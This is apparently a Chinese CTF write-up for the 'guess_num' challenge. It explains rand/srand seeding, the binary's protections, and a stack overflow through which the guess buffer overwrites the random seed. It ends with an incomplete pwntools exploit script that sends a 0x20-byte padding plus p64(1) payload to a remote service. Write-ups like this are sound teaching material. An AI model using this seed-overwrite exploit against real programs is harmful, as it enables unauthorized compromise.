任务三:guess_num int_overflow string
guess_num
解这道题必须搞清楚一个知识:随机数生成的原理
关于rand和srand
随机函数生成的随机数并不是真的随机数,他们只是在一定范围内随机,实际上是一段数字的循环,这些数字取决于随机种子。在调用rand()函数时,必须先利用srand()设好随机数种子,如果未设随机数种子,rand()在调用时会自动设随机数种子为1。
关于ctype库与dll
我们使用python标准库中自带的ctypes模块进行python和c的混合编程
libc共享库
可以使用ldd查找
checksec
可以看出文件是64位的,开启了Canary和NX保护。
ida查看源代码
发现要输入十次随机数产生的值,每次都要正确,如果有一次不对就GG
双击sub_C3E
可以看出,在v7处有一个栈溢出,我们可以通过栈溢出到sub_C3E()拿到flag。
进入v7
发现var_30在栈中占0x20,可以覆盖到seed
如果使输入的guessnumber,即v4等于随机数v6,即可cat flag。
查找文件所使用的的libc
代码如下:
from pwn import *
from ctypes import *
p= remote('111.200.241.244','34583')
#p=process("./guess_num")
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
payload = 'a'*0x20 + p64(1)
p.sendlineafter